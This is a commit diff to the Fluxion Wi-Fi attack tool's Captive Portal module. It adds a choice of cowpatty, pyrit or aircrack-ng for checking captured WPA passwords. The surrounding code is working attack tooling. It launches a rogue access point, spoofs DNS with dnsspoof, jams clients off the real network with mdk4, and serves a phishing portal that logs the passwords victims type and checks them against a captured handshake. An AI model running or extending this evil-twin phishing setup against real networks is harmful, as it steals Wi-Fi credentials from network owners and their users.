Added discrete options to authenticator.

The authenticator may now be directed to use one of cowpatty, pyrit, or aircrack-ng, for password verification.
2020-04-26 02:46:05 -05:00 · 2020-04-26 02:46:05 -05:00 · 597275372b
parent 0590dc0b63
commit 597275372b
2 changed files with 90 additions and 82 deletions
--- a/Portal/attack.sh
+++ b/Portal/attack.sh
@ -8,11 +8,6 @@ CaptivePortalState="Not Ready"
 CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog"
 CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog"

-CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant")
-CaptivePortalAuthenticationMethodsInfo=(
-  "(handshake file, ${CGrn}recommended$CClr)"
-) # "(Target AP authentication, slow)")
-
 # ============= < Virtual Network Configuration > ============ #
 # To avoid collapsing with an already existing network,
 # we'll use a somewhat uncommon network and server IP.
@ -205,7 +200,7 @@ captive_portal_unset_authenticator() {
  if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi

  case "$CaptivePortalAuthenticatorMode" in
-    "hash")
+    "hash"*)
      echo "Unset hash is done automatically." > $FLUXIONOutputDevice ;;
  esac

@ -214,15 +209,15 @@ captive_portal_unset_authenticator() {
  # If we've only got one option, then the user skipped this section
  # by auto-selecting that single option, so we unset the previous
  # phase along with this one to properly take the user back.
-  if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then
-    return 1 # Trigger undo chain because it was auto-selected.
-  fi
+  #if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then
+  #  return 1 # Trigger undo chain because it was auto-selected.
+  #fi
 }

 captive_portal_set_authenticator() {
  if [ "$CaptivePortalAuthenticatorMode" ]; then
    case "$CaptivePortalAuthenticatorMode" in
-      "hash")
+      "hash"*)
        if [ "$CaptivePortalHashPath" ]; then
          echo "Captive Portal authentication mode is already set, skipping!" \
            > $FLUXIONOutputDevice
@ -234,15 +229,15 @@ captive_portal_set_authenticator() {

  captive_portal_unset_authenticator

-  # If we've got only one choice, auto-select it for the user.
-  if [ \
-    ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \
-    ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \
-    "$FLUXIONAuto" ]; then
-    CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}"
-    echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \
-      > $FLUXIONOutputDevice
-  else
+  # # If we've got only one choice, auto-select it for the user.
+  #if [ \
+  #  ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \
+  #  ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \
+  #  "$FLUXIONAuto" ]; then
+  #  CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}"
+  #  echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \
+  #    > $FLUXIONOutputDevice
+  #else
  fluxion_header

  echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery"
@ -251,15 +246,16 @@ captive_portal_set_authenticator() {
  fluxion_target_show

  local choices=(
-      "${CaptivePortalAuthenticationMethods[@]}"
+    "$CaptivePortalVerificationMethodPyritOption"
+    "$CaptivePortalVerificationMethodCowpattyOption"
+    "$CaptivePortalVerificationMethodAircrackNG"
    "$FLUXIONGeneralBackOption"
  )
-    io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" \
-      choices[@] CaptivePortalAuthenticationMethodsInfo[@]
+  io_query_choice "" choices[@]

  echo

-    CaptivePortalAuthenticatorMode="${IOQueryFormatFields[0]}"
+  CaptivePortalAuthenticatorMode="${IOQueryChoice}"

  # If we're going back, reset everything and abort.
  if [[ \
@ -268,12 +264,12 @@ captive_portal_set_authenticator() {
    captive_portal_unset_authenticator
    return -1
  fi
-  fi
+  #fi

  # Process the authentication method selected.
  local result=1 # Assume failure at first.
  case "$CaptivePortalAuthenticatorMode" in
-    "hash")
+    "hash"*)
      # Pass default path if no path is set yet.
      if [ ! "$CaptivePortalHashPath" ]; then
        CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap"
@ -848,38 +844,34 @@ while [ \$AuthenticatorState = \"running\" ]; do

 " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"

-  if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
-    # 05/26/19: Default to cowpatty for verification since aircrack-ng appears to have a bug.
-    if which cowpatty &> /dev/null; then
+  if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
+    case "$CaptivePortalAuthenticatorMode" in
+      # Cowpatty
+      "$CaptivePortalVerificationMethodCowpattyOption")
+        local -r verifiedCondition="cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> $FLUXIONOutputDevice"
+        ;;
+      # Pyrit
+      "$CaptivePortalVerificationMethodPyritOption")
+        local -r verifiedCondition="pyrit -r \"$CaptivePortalHashPath\" -i \"$FLUXIONWorkspacePath/candidate.txt\" -b $FluxionTargetMAC attack_passthrough &> $FLUXIONOutputDevice"
+        ;;
+
+      *)
+        # Aircrack-ng
+        # Check if we've got the correct password by looking for
+        # anything other than \"Passphrase not in\" or \"KEY NOT FOUND\".
+        local -r verifiedCondition="aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\""
+        ;;
+    esac
    echo "
    if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
-          if cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> /dev/null; then
+        if $verifiedCondition; then
            echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
-
            sleep 1
            break
-
        else
            echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
-
        fi
    fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
-    else
-      echo "
-      if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
-          # Check if we've got the correct password by looking for anything other than \"Passphrase not in\" or \"KEY NOT FOUND\".
-          if ! aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\"; then
-              echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
-
-              sleep 1
-              break
-
-          else
-              echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
-
-          fi
-      fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
-    fi
  fi

  local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g")
@ -922,7 +914,7 @@ while [ \$AuthenticatorState = \"running\" ]; do

    echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"

-  if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
+  if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
    echo "
    sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
  fi
@ -953,7 +945,7 @@ Mac: $(captive_portal_get_IP_MAC) ($(captive_portal_get_MAC_brand))
 IP: $(captive_portal_get_client_IP)
 \" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"

-  if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
+  if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
 #    echo "
 # aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\
 #" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
@ -1345,41 +1337,43 @@ save_attack() {

 stop_attack() {
  # Attempt to find PIDs of any running authenticators.
-  local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}')
+  #local authenticatorPID=$(pgrep
+  #local authenticatorPID=$( \
+  #  ps a | grep -vE "xterm|grep" | \
+  #  grep captive_portal_authenticator.sh | awk '{print $1}' \
+  #)

  # Signal any authenticator to stop authentication loop.
-  if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi
+  fluxion_kill_lineage "--signal SIGABRT" \
+    "xterm.+captive_portal_authenticator\\.sh"

  if [ "$CaptivePortalJammerServiceXtermPID" ]; then
-    kill $(pgrep -P $CaptivePortalJammerServiceXtermPID \
-      2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
+    fluxion_kill_lineage $CaptivePortalJammerServiceXtermPID
    CaptivePortalJammerServiceXtermPID="" # Clear parent PID
  fi
  sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk4_blacklist.lst"

  # Kill captive portal web server log viewer.
  if [ "$CaptivePortalWebServiceXtermPID" ]; then
-    kill $CaptivePortalWebServiceXtermPID &> $FLUXIONOutputDevice
+    fluxion_kill_lineage $CaptivePortalWebServiceXtermPID
    CaptivePortalWebServiceXtermPID="" # Clear service PID
  fi

  # Kill captive portal web server.
  if [ "$CaptivePortalWebServicePID" ]; then
-    kill $CaptivePortalWebServicePID &> $FLUXIONOutputDevice
+    fluxion_kill_lineage $CaptivePortalWebServicePID
    CaptivePortalWebServicePID="" # Clear service PID
  fi

  # Kill DNS service if one is found.
  if [ "$CaptivePortalDNSServiceXtermPID" ]; then
-    kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \
-      2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
+    fluxion_kill_lineage $CaptivePortalDNSServiceXtermPID
    CaptivePortalDNSServiceXtermPID="" # Clear parent PID
  fi

  # Kill DHCP service.
  if [ "$CaptivePortalDHCPServiceXtermPID" ]; then
-    kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID \
-      2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
+    fluxion_kill_lineage $CaptivePortalDHCPServiceXtermPID
    CaptivePortalDHCPServiceXtermPID="" # Clear parent PID
  fi
  sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt"
@ -1432,6 +1426,8 @@ start_attack() {
    "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" &
  # Save parent's pid, to get to child later.
  CaptivePortalDHCPServiceXtermPID=$!
+  echo "DHCP Service: $CaptivePortalDHCPServiceXtermPID"
+    >> $FLUXIONOutputDevice

  echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice"
  xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \
@ -1439,6 +1435,8 @@ start_attack() {
    "dnsspoof -i ${CaptivePortalAccessInterface} -f \"$FLUXIONWorkspacePath/hosts\"" &
  # Save parent's pid, to get to child later.
  CaptivePortalDNSServiceXtermPID=$!
+  echo "DNS Service: $CaptivePortalDNSServiceXtermPID"
+    >> $FLUXIONOutputDevice

  echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice"
  lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \
@ -1449,6 +1447,8 @@ start_attack() {
    -title "FLUXION Web Service" -e \
    "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" &
  CaptivePortalWebServiceXtermPID=$!
+  echo "Web Service: $CaptivePortalWebServiceXtermPID"
+    >> $FLUXIONOutputDevice

  echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice"
  echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk4_blacklist.lst"
@ -1482,12 +1482,17 @@ start_attack() {
        # Save parent's pid, to get to child later.
    	CaptivePortalJammerServiceXtermPID=$!
  fi
+  echo "Jammer Service: $CaptivePortalJammerServiceXtermPID"
+    >> $FLUXIONOutputDevice

  echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice"
  xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \
    -title "FLUXION AP Authenticator" \
    -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" &

+  local -r authService=$!
+  echo "Auth Service: $authService"
+    >> $FLUXIONOutputDevice
 }

 # FLUXSCRIPT END
--- a/Portal/language/en.sh
+++ b/Portal/language/en.sh
@ -19,6 +19,9 @@ CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr
 CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 CaptivePortalVerificationMethodQuery="Select a password verification method"
+CaptivePortalVerificationMethodPyritOption="hash - pyrit"
+CaptivePortalVerificationMethodCowpattyOption="hash - cowpatty"
+CaptivePortalVerificationMethodAircrackNG="hash - aircrack-ng (default, ${CYel}unreliable${CClr})"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal."
 CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"